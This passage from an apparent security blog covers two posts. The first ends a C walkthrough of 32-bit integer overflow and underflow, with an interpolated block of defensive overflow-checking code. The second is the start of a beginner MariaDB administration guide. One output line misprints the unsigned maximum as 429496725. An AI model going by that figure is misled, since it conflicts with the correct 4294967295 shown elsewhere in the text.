<span style="color: #d0d0d0;">printf(</span><span style="color: #ed9d13;">"Current value for my_num is: %u \n"</span><span style="color: #d0d0d0;">,</span> <span style="color: #d0d0d0;">my_num);</span>
<span style="color: #6ab825; font-weight: bold;">return</span> <span style="color: #3677a9;">0</span><span style="color: #d0d0d0;">;</span>
<span style="color: #d0d0d0;">}</span>
</pre></div>
<p>Let's compile and run this small program:</p><div style="background: rgb(32, 32, 32); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: #d0d0d0;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: #d0d0d0;">└─$ gcc intOverflow.c -o intOverflow -m32 && ./intOverflow</span>
<span style="color: #d0d0d0;">Size of my_num is :</span><span style="color: #fcff01;"><b>4 bytes or 32 bits</b></span>
<span style="color: #d0d0d0;">Current value for my_num is: </span><b><span style="color: #fcff01;">429496725</span></b>
</pre></div>
<p>Above we see the size of the <i>my_num</i> integer is 4 bytes or 32 bits. We also see the current value is set to the maximum value possible for a 32-bit unsigned int.</p><p>What would happen if we add 1 to this value? Here is the updated code:</p><div style="background: rgb(32, 32, 32); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: #cd2828; font-weight: bold;">#include <stdio.h></span>
<span style="color: #6ab825; font-weight: bold;">int</span> <span style="color: #447fcf;">main</span><span style="color: #d0d0d0;">()</span>
<span style="color: #d0d0d0;">{</span>
<span style="color: #999999; font-style: italic;">// Define an unsigned variable set to the maximum 32-bit value</span>
<span style="color: #6ab825; font-weight: bold;">unsigned</span> <span style="color: #6ab825; font-weight: bold;">int</span> <span style="color: #d0d0d0;">my_num</span> <span style="color: #d0d0d0;">=</span> <span style="color: #fcff01;"><b>4294967295</b></span><span style="color: #d0d0d0;">;</span>
<span style="color: #999999; font-style: italic;">// Get the size of an integer for this compiled code</span>
<span style="color: #d0d0d0;">printf(</span><span style="color: #ed9d13;">"Size of my_num is :%d bytes or %d bits \n"</span><span style="color: #d0d0d0;">,</span> <span style="color: #6ab825; font-weight: bold;">sizeof</span><span style="color: #d0d0d0;">(my_num),</span> <span style="color: #6ab825; font-weight: bold;">sizeof</span><span style="color: #d0d0d0;">(my_num)</span> <span style="color: #d0d0d0;">*</span> <span style="color: #3677a9;">8</span><span style="color: #d0d0d0;">);</span>
<span style="color: #999999; font-style: italic;">// Print the value and the value plus one; the sum wraps around</span>
<span style="color: #d0d0d0;">printf(</span><span style="color: #ed9d13;">"%u + 1 = %u \n"</span><span style="color: #d0d0d0;">,</span> <span style="color: #d0d0d0;">my_num,</span> <b><span style="color: #fcff01;"><span>my_num</span> <span>+</span> <span>1</span></span></b><span style="color: #d0d0d0;">);</span>
<span style="color: #6ab825; font-weight: bold;">return</span> <span style="color: #3677a9;">0</span><span style="color: #d0d0d0;">;</span>
<span style="color: #d0d0d0;">}</span>
</pre></div>
<br /><div>When compiled and run, we get:</div><div><br /></div><div><div style="background: rgb(32, 32, 32); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: #d0d0d0;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: #d0d0d0;">└─$ gcc intOverflow.c -o intOverflow -m32 && ./intOverflow</span>
<span style="color: #d0d0d0;">Size of my_num is :4 bytes or 32 bits</span>
<b><span style="color: #fcff01;">4294967295 + 1 = 0</span></b>
</pre></div>
</div><div><br /></div><div><div>Realistically, that value should have been <b>4294967295 + 1 = 4294967296</b>, but 4,294,967,296 needs a 33rd bit, which a 32-bit unsigned int does not have.</div><div><br /></div><div>It looks like we hit the overflow.</div><div><br /></div><div>What would happen if we update the code to add 10 instead? Here we see:</div></div><div><br /></div><div><div style="background: rgb(32, 32, 32); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: #d0d0d0;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: #d0d0d0;">└─$ gcc intOverflow.c -o intOverflow -m32 && ./intOverflow</span>
<span style="color: #d0d0d0;">Size of my_num is :4 bytes or 32 bits</span>
<b><span style="color: #fcff01;">4294967295 + 10 = 9</span></b>
</pre></div>
</div><div><br /></div><div><div>From above, we see we are wrapping around. The arithmetic is performed modulo 2**32: going over by 1 gives 4294967296 - 4294967296 = 0, and going over by 10 leaves 9.</div><div><br /></div><div>Anyhow, that's it for the unsigned int overflow.</div><div><br /></div><h2 style="text-align: left;"><b>Signed int</b></h2><div>As discussed above, from both the signed and unsigned int perspective, the size is 4 bytes or 32 bits. The difference between signed and unsigned is that signed can accommodate negative numbers. While the range for unsigned is 0 to 4,294,967,295, signed values run from −2,147,483,648 to 2,147,483,647. Let's take the largest negative value, −2,147,483,648, and subtract 0 from it.</div><div><br /></div><div>Here is the code:</div></div><div><br /></div><div style="background: rgb(32, 32, 32); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: #cd2828; font-weight: bold;">#include <stdio.h></span>
<span style="color: #6ab825; font-weight: bold;">int</span> <span style="color: #447fcf;">main</span><span style="color: #d0d0d0;">()</span>
<span style="color: #d0d0d0;">{</span>
<span style="color: #999999; font-style: italic;">// Define a signed integer. Notice the "-"</span>
<span style="color: #6ab825; font-weight: bold;">signed</span> <span style="color: #6ab825; font-weight: bold;">int</span> <span style="color: #d0d0d0;">my_num_signed</span> <span style="color: #d0d0d0;">=</span> <b><span style="color: #fcff01;"><span>-</span><span>2147483648</span></span></b><span style="color: #d0d0d0;">;</span>
<span style="color: #999999; font-style: italic;">// Get the size of a signed integer for this compiled code</span>
<span style="color: #d0d0d0;">printf(</span><span style="color: #ed9d13;">"Size of my_num_signed is :%d bytes or %d bits \n"</span><span style="color: #d0d0d0;">,</span> <span style="color: #6ab825; font-weight: bold;">sizeof</span><span style="color: #d0d0d0;">(my_num_signed),</span> <span style="color: #6ab825; font-weight: bold;">sizeof</span><span style="color: #d0d0d0;">(my_num_signed)</span> <span style="color: #d0d0d0;">*</span> <span style="color: #3677a9;">8</span><span style="color: #d0d0d0;">);</span>
<span style="color: #999999; font-style: italic;">// Print the value of my number to the screen</span>
<span style="color: #d0d0d0;">printf(</span><span style="color: #ed9d13;">"%d - 0 = %d \n"</span><span style="color: #d0d0d0;">,</span> <span style="color: #d0d0d0;">my_num_signed,</span> <b><span style="color: #fcff01;"><span>my_num_signed</span> <span>-</span><span>0</span></span></b><span style="color: #d0d0d0;">);</span>
<span style="color: #6ab825; font-weight: bold;">return</span> <span style="color: #3677a9;">0</span><span style="color: #d0d0d0;">;</span>
<span style="color: #d0d0d0;">}</span>
</pre>
</div>
<div><br /></div><div><div>When compiled, here is what we have:</div><div><br /></div><div><div style="background: rgb(32, 32, 32); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: #d0d0d0;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: #d0d0d0;">└─$ gcc intOverflow.c -o intOverflow -m32 && ./intOverflow</span>
<span style="color: #d0d0d0;">Size of my_num_signed is :4 bytes or 32 bits</span>
<b><span style="color: #fcff01;">-2147483648 - 0 = -2147483648</span></b>
</pre></div>
</div><div><br /></div><div><div>The above is expected as <b>-2147483648 - 0 = -2147483648.</b></div><div><br /></div><div>Let's modify the code to subtract 1 instead of 0.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(32, 32, 32); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10
11
12
13</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: #cd2828; font-weight: bold;">#include <stdio.h></span>
<span style="color: #6ab825; font-weight: bold;">int</span> <span style="color: #447fcf;">main</span><span style="color: #d0d0d0;">()</span>
<span style="color: #d0d0d0;">{</span>
<span style="color: #6ab825; font-weight: bold;">signed</span> <span style="color: #6ab825; font-weight: bold;">int</span> <span style="color: #d0d0d0;">my_num_signed</span> <span style="color: #d0d0d0;">=</span> <b><span style="color: #fcff01;"><span>-</span><span>2147483648</span></span></b><span style="color: #d0d0d0;">;</span>
<span style="color: #999999; font-style: italic;">// Get the size of a signed integer for this compiled code (%zu is the conversion for size_t, which sizeof yields)</span>
<span style="color: #d0d0d0;">printf(</span><span style="color: #ed9d13;">"Size of my_num_signed is :%zu bytes or %zu bits \n"</span><span style="color: #d0d0d0;">,</span> <span style="color: #6ab825; font-weight: bold;">sizeof</span><span style="color: #d0d0d0;">(my_num_signed),</span> <span style="color: #6ab825; font-weight: bold;">sizeof</span><span style="color: #d0d0d0;">(my_num_signed)</span> <span style="color: #d0d0d0;">*</span> <span style="color: #3677a9;">8</span><span style="color: #d0d0d0;">);</span>
<span style="color: #999999; font-style: italic;">// Print the value of my number to the screen</span>
<span style="color: #d0d0d0;">printf(</span><span style="color: #ed9d13;">"%d - 1 = %d \n"</span><span style="color: #d0d0d0;">,</span> <span style="color: #d0d0d0;">my_num_signed,</span> <b><span style="color: #fcff01;"><span>my_num_signed</span> <span>-</span><span>1</span></span></b><span style="color: #d0d0d0;">);</span>
<span style="color: #6ab825; font-weight: bold;">return</span> <span style="color: #3677a9;">0</span><span style="color: #d0d0d0;">;</span>
<span style="color: #d0d0d0;">}</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div><div>When this is compiled we see </div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(32, 32, 32); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="background-color: #e3d2d2; color: #a61717;">┌──</span><span style="color: #d0d0d0;">(kali</span><span style="background-color: #e3d2d2; color: #a61717;">㉿</span><span style="color: #d0d0d0;">securitynik)-[~]</span>
<span style="background-color: #e3d2d2; color: #a61717;">└─$</span> <span style="color: #d0d0d0;">gcc</span> <span style="color: #d0d0d0;">intOverflow.c</span> <span style="color: #d0d0d0;">-o</span> <span style="color: #d0d0d0;">intOverflow</span> <span style="color: #d0d0d0;">-m32</span> <span style="color: #d0d0d0;">&&</span> <span style="color: #d0d0d0;">./intOverflow</span>
<span style="color: #d0d0d0;">Size</span> <span style="color: #d0d0d0;">of</span> <span style="color: #d0d0d0;">my_num_signed</span> <span style="color: #d0d0d0;">is</span> <span style="color: #d0d0d0;">:</span><span style="color: #3677a9;">4</span> <span style="color: #d0d0d0;">bytes</span> <span style="color: #d0d0d0;">or</span> <span style="color: #3677a9;">32</span> <span style="color: #d0d0d0;">bits</span>
<b><span style="color: #fcff01;"><span>-</span><span>2147483648</span> <span>-</span> <span>1</span> <span>=</span> <span>2147483647</span>
</span></b></pre></td></tr></tbody></table></div>
</div><div><br /></div><div><div>Oh! oh! oh! oh! What we expect is that <b>-2147483648 - 1 should equal -2,147,483,649</b>. That value does not fit in 32 bits, so the result wrapped around to the largest positive value. Therefore, the above resulted in an underflow.</div><div><br /></div><div>Similarly, if we subtract 10 we see:</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(32, 32, 32); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="background-color: #e3d2d2; color: #a61717;">┌──</span><span style="color: #d0d0d0;">(kali</span><span style="background-color: #e3d2d2; color: #a61717;">㉿</span><span style="color: #d0d0d0;">securitynik)-[~]</span>
<span style="background-color: #e3d2d2; color: #a61717;">└─$</span> <span style="color: #d0d0d0;">gcc</span> <span style="color: #d0d0d0;">intOverflow.c</span> <span style="color: #d0d0d0;">-o</span> <span style="color: #d0d0d0;">intOverflow</span> <span style="color: #d0d0d0;">-m32</span> <span style="color: #d0d0d0;">&&</span> <span style="color: #d0d0d0;">./intOverflow</span>
<span style="color: #d0d0d0;">Size</span> <span style="color: #d0d0d0;">of</span> <span style="color: #d0d0d0;">my_num_signed</span> <span style="color: #d0d0d0;">is</span> <span style="color: #d0d0d0;">:</span><span style="color: #3677a9;">4</span> <span style="color: #d0d0d0;">bytes</span> <span style="color: #d0d0d0;">or</span> <span style="color: #3677a9;">32</span> <span style="color: #d0d0d0;">bits</span>
<b><span style="color: #fcff01;"><span>-</span><span>2147483648</span> <span>-</span> <span>10</span> <span>=</span> <span>2147483638</span>
</span></b></pre></td></tr></tbody></table></div>
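The defensive side of the wrap-around shown above, as an added example that is not part of the original post: a portable pre-condition test against INT_MIN/INT_MAX, the GCC/Clang `__builtin_sub_overflow` / `__builtin_add_overflow` built-ins, and a helper that reproduces the wrapped value the -m32 build printed using unsigned (defined) arithmetic, so the result can be compared without relying on undefined signed overflow. It goes beyond the subtraction cases so far by also covering the positive side (INT_MAX + 1). All function names here are mine.

```c
#include <limits.h>
#include <stdbool.h>
#include <stdio.h>

/* Added example (not from the original post); function names are my own.
 * The post's builds show INT_MIN - 1 printing 2147483647 and INT_MAX + 1
 * printing -2147483648. Signed overflow is undefined behaviour in C, so the
 * fix is to test BEFORE doing the arithmetic, never to inspect the result. */

/* Portable pre-condition: would a - b leave the int range? */
bool sub_would_overflow(int a, int b)
{
    /* Subtracting a positive b can only fall below INT_MIN;
     * subtracting a negative b can only climb above INT_MAX.
     * Neither INT_MIN + b (b > 0) nor INT_MAX + b (b < 0) can itself overflow. */
    return (b > 0 && a < INT_MIN + b) || (b < 0 && a > INT_MAX + b);
}

/* Portable pre-condition: would a + b leave the int range? */
bool add_would_overflow(int a, int b)
{
    return (b > 0 && a > INT_MAX - b) || (b < 0 && a < INT_MIN - b);
}

/* Checked subtraction: stores the result and returns true only when it fits.
 * On GCC/Clang the compiler built-in performs the same test in one step. */
bool checked_sub(int a, int b, int *out)
{
#if defined(__GNUC__)
    return !__builtin_sub_overflow(a, b, out);
#else
    if (sub_would_overflow(a, b))
        return false;
    *out = a - b;
    return true;
#endif
}

bool checked_add(int a, int b, int *out)
{
#if defined(__GNUC__)
    return !__builtin_add_overflow(a, b, out);
#else
    if (add_would_overflow(a, b))
        return false;
    *out = a + b;
    return true;
#endif
}

/* Reinterpret a 32-bit unsigned value as the two's-complement int the post's
 * output shows, without ever performing a signed overflow. */
static int as_twos_complement(unsigned u)
{
    return u <= (unsigned)INT_MAX ? (int)u : -(int)(UINT_MAX - u) - 1;
}

/* The value the unchecked code wraps to, computed in unsigned arithmetic
 * (which is defined to wrap modulo 2^32). */
int wrapped_sub(int a, int b) { return as_twos_complement((unsigned)a - (unsigned)b); }
int wrapped_add(int a, int b) { return as_twos_complement((unsigned)a + (unsigned)b); }

static void report(const char *op, int a, int b, bool ok, int checked, int wrapped)
{
    if (ok)
        printf("%d %s %d = %d (fits)\n", a, op, b, checked);
    else
        printf("%d %s %d = REJECTED (unchecked code would wrap to %d)\n", a, op, b, wrapped);
}

int main(void)
{
    /* Same inputs as the post: INT_MIN - 0, INT_MIN - 1, INT_MIN - 10, INT_MAX + 1 */
    int subs[] = {0, 1, 10};
    for (size_t i = 0; i < sizeof subs / sizeof subs[0]; i++) {
        int r = 0;
        bool ok = checked_sub(INT_MIN, subs[i], &r);
        report("-", INT_MIN, subs[i], ok, r, wrapped_sub(INT_MIN, subs[i]));
    }
    int r = 0;
    bool ok = checked_add(INT_MAX, 1, &r);
    report("+", INT_MAX, 1, ok, r, wrapped_add(INT_MAX, 1));

    /* Build-time options that surface the same bug at run time in test builds:
     *   gcc -fsanitize=signed-integer-overflow ...  (UBSan reports the wrap)
     *   gcc -ftrapv ...                             (aborts on signed overflow) */
    return 0;
}
```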
</div><div><br /></div><div><div>Let's wrap up with one more. This time, taking the largest number on the positive side of the signed range.</div><div><br /></div><div>Here is the code:</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(32, 32, 32); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10
11
12
13</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: #cd2828; font-weight: bold;">#include <stdio.h></span>
<span style="color: #6ab825; font-weight: bold;">int</span> <span style="color: #447fcf;">main</span><span style="color: #d0d0d0;">()</span>
<span style="color: #d0d0d0;">{</span>
<span style="color: #6ab825; font-weight: bold;">signed</span> <span style="color: #6ab825; font-weight: bold;">int</span> <span style="color: #d0d0d0;">my_num_signed</span> <span style="color: #d0d0d0;">=</span> <span style="color: #3677a9;">2147483647</span><span style="color: #d0d0d0;">;</span>
<span style="color: #999999; font-style: italic;">// Get the size of a signed integer for this compiled code (%zu is the conversion for size_t, which sizeof yields)</span>
<span style="color: #d0d0d0;">printf(</span><span style="color: #ed9d13;">"Size of my_num_signed is :%zu bytes or %zu bits \n"</span><span style="color: #d0d0d0;">,</span> <span style="color: #6ab825; font-weight: bold;">sizeof</span><span style="color: #d0d0d0;">(my_num_signed),</span> <span style="color: #6ab825; font-weight: bold;">sizeof</span><span style="color: #d0d0d0;">(my_num_signed)</span> <span style="color: #d0d0d0;">*</span> <span style="color: #3677a9;">8</span><span style="color: #d0d0d0;">);</span>
<span style="color: #999999; font-style: italic;">// Print the value of my number to the screen</span>
<span style="color: #d0d0d0;">printf(</span><span style="color: #ed9d13;">"%d + 1 = %d \n"</span><span style="color: #d0d0d0;">,</span> <b><span style="color: #fcff01;"><span>my_num_signed,</span> <span>my_num_signed</span> <span>+</span> <span>1</span></span></b><span style="color: #d0d0d0;">);</span>
<span style="color: #6ab825; font-weight: bold;">return</span> <span style="color: #3677a9;">0</span><span style="color: #d0d0d0;">;</span>
<span style="color: #d0d0d0;">}</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div><div>When compiled and run we see ...</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(32, 32, 32); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="background-color: #e3d2d2; color: #a61717;">┌──</span><span style="color: #d0d0d0;">(kali</span><span style="background-color: #e3d2d2; color: #a61717;">㉿</span><span style="color: #d0d0d0;">securitynik)-[~]</span>
<span style="background-color: #e3d2d2; color: #a61717;">└─$</span> <span style="color: #d0d0d0;">gcc</span> <span style="color: #d0d0d0;">intOverflow.c</span> <span style="color: #d0d0d0;">-o</span> <span style="color: #d0d0d0;">intOverflow</span> <span style="color: #d0d0d0;">-m32</span> <span style="color: #d0d0d0;">&&</span> <span style="color: #d0d0d0;">./intOverflow</span>
<span style="color: #d0d0d0;">Size</span> <span style="color: #d0d0d0;">of</span> <span style="color: #d0d0d0;">my_num_signed</span> <span style="color: #d0d0d0;">is</span> <span style="color: #d0d0d0;">:</span><span style="color: #3677a9;">4</span> <span style="color: #d0d0d0;">bytes</span> <span style="color: #d0d0d0;">or</span> <span style="color: #3677a9;">32</span> <span style="color: #d0d0d0;">bits</span>
<b><span style="color: #fcff01;"><span>2147483647</span> <span>+</span> <span>1</span> <span>=</span> <span>-</span><span>2147483648</span>
</span></b></pre></td></tr></tbody></table></div>
</div><div><br /></div><div><div>The above is obviously wrong: the sum of two positive numbers should never give you a negative number.</div><div><br /></div><div>That's it for this post.</div><div><br /></div><div><br /></div><div><b>References:</b></div><div><a href="https://www.cs.utexas.edu/~shmat/courses/cs361s/blexim.txt" target="_blank">https://www.cs.utexas.edu/~shmat/courses/cs361s/blexim.txt</a></div><div><a href="https://stackoverflow.com/questions/18203609/does-d-in-string-format-work-for-unsigned-integers-also" target="_blank">https://stackoverflow.com/questions/18203609/does-d-in-string-format-work-for-unsigned-integers-also</a></div><div><a href="https://www.welivesecurity.com/2022/02/21/integer-overflow-how-it-occur-can-be-prevented/" target="_blank">https://www.welivesecurity.com/2022/02/21/integer-overflow-how-it-occur-can-be-prevented/</a></div><div><a href="https://www.acunetix.com/blog/web-security-zone/what-is-integer-overflow/" target="_blank">https://www.acunetix.com/blog/web-security-zone/what-is-integer-overflow/</a></div></div><p></p></div>Nik Alleyne, MSc | CISSP | GC|IA|IH|REM|PENhttp://www.blogger.com/profile/10282323977269843041noreply@blogger.com0tag:blogger.com,1999:blog-7303400454979750101.post-14919597376459987342022-10-25T18:30:00.002-07:002022-10-25T18:30:21.567-07:00Beginning MariaDB / MySQL - Basic Administration Stuff<p>As I continue being a mentor for the <a href="https://www.cybersecurecatalyst.ca/" target="_blank">SANS/Ryerson/Rogers</a> Cyber Secure Catalyst program and as the group goes through working with databases, I was asked to provide some guidance on using MariaDB/MySQL. 
The guidance I've provided below is meant to address the questions asked directly via the mentor session while also going a bit deeper into some of the basics that you should know, not only for MariaDB but for administering any SQL database server.</p><p>With that in mind, let's get into the blog post.</p><p>First, verify the version of MySQL currently installed.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[/tmp]</span>
<span style="color: white;">└─$ mysql --version </span>
<span style="color: white;">mysql Ver 15.1 Distrib 10.6.8-MariaDB, for debian-linux-gnu (x86_64) using EditLine wrapper</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Looking to see if MySQL is running</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[/tmp]</span>
<span style="color: white;">└─$ sudo ss --numeric --listening --tcp --processes </span>
<span style="color: white;">State Recv-Q Send-Q Local Address:Port Peer Address:Port Process </span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>At this point, it looks like it is not. Starting the MySQL service.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[/tmp]</span>
<span style="color: white;">└─$ sudo systemctl start mysql.service</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Verifying once again that the service is available.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[/tmp]</span>
<span style="color: white;">└─$ sudo ss --numeric --listening --tcp --processes </span>
<span style="color: white;">State Recv-Q Send-Q Local Address:Port Peer Address:Port Process </span>
<span style="color: white;">LISTEN 0 80 127.0.0.1:3306 0.0.0.0:* users:(("mariadbd",pid=2213,fd=21))</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>With the service available, time to connect to it. </p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[/tmp]</span>
<span style="color: white;">└─$ sudo mysql</span>
<span style="color: white;">Welcome to the MariaDB monitor. Commands end with ; or \g.</span>
<span style="color: white;">Your MariaDB connection id is 37</span>
<span style="color: white;">Server version: 10.6.8-MariaDB-1 Debian buildd-unstable</span>
<span style="color: white;">Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.</span>
<span style="color: white;">Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.</span>
<span style="color: white;">MariaDB [(none)]> </span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Looking to see the current databases:</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [(none)]> show databases;</span>
<span style="color: white;">+--------------------+</span>
<span style="color: white;">| Database |</span>
<span style="color: white;">+--------------------+</span>
<span style="color: white;">| information_schema |</span>
<span style="color: white;">| mysql |</span>
<span style="color: white;">| performance_schema |</span>
<span style="color: white;">| sys |</span>
<span style="color: white;">+--------------------+</span>
<span style="color: white;">4 rows in set (0.009 sec)</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Creating my own database and verifying its creation.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [(none)]> CREATE DATABASE IF NOT EXISTS securitynik_db;</span>
<span style="color: white;">Query OK, 1 row affected (0.000 sec)</span>
<span style="color: white;">MariaDB [(none)]> show databases;</span>
<span style="color: white;">+--------------------+</span>
<span style="color: white;">| Database |</span>
<span style="color: white;">+--------------------+</span>
<span style="color: white;">| information_schema |</span>
<span style="color: white;">| mysql |</span>
<span style="color: white;">| performance_schema |</span>
<span style="color: white;">| securitynik_db |</span>
<span style="color: white;">| sys |</span>
<span style="color: white;">+--------------------+</span>
<span style="color: white;">5 rows in set (0.000 sec)</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Change to my newly created database</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [(none)]> use securitynik_db;</span>
<span style="color: white;">Database changed</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Create a table named <i>interesting_data</i>.</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> CREATE TABLE IF NOT EXISTS interesting_data ( </span>
<span style="color: white;"> -> file_no INT NOT NULL AUTO_INCREMENT PRIMARY KEY,</span>
<span style="color: white;"> -> owner VARCHAR(100), </span>
<span style="color: white;"> -> password VARCHAR(100))</span>
<span style="color: white;"> -> COMMENT 'This database contains sensitive information';</span>
<span style="color: white;">Query OK, 0 rows affected (0.027 sec)</span>
</pre></div>
</div><div><br /></div><div>Verify the table was successfully created</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> show tables;</span>
<span style="color: white;">+--------------------------+</span>
<span style="color: white;">| Tables_in_securitynik_db |</span>
<span style="color: white;">+--------------------------+</span>
<span style="color: white;">| interesting_data |</span>
<span style="color: white;">+--------------------------+</span>
<span style="color: white;">1 row in set (0.000 sec)</span>
</pre></div>
</div><div><br /></div><div><div>Alternatively</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> SHOW TABLES FROM securitynik_db;</span>
<span style="color: white;">+--------------------------+</span>
<span style="color: white;">| Tables_in_securitynik_db |</span>
<span style="color: white;">+--------------------------+</span>
<span style="color: white;">| interesting_data |</span>
